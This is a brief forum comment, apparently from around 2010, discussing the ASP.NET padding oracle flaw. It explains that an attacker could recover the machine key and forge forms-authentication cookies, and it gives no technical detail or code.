|
|
|
|
|
|
by storm
5750 days ago
|
|
|
Reporting on this story has so far been pretty crap, and light on details; hopefully a clearer picture will develop after ekoparty. But this is a serious issue. See http://visualstudiomagazine.com/articles/2010/09/14/aspnet-s.... The machine key can be determined if you're using AES (the default). And the machine key can be used to forge forms auth cookies. It's not about figuring out what's in the client cookies - it's about forging cookies that the server completely trusts on account of the (broken) encryption. |
|
|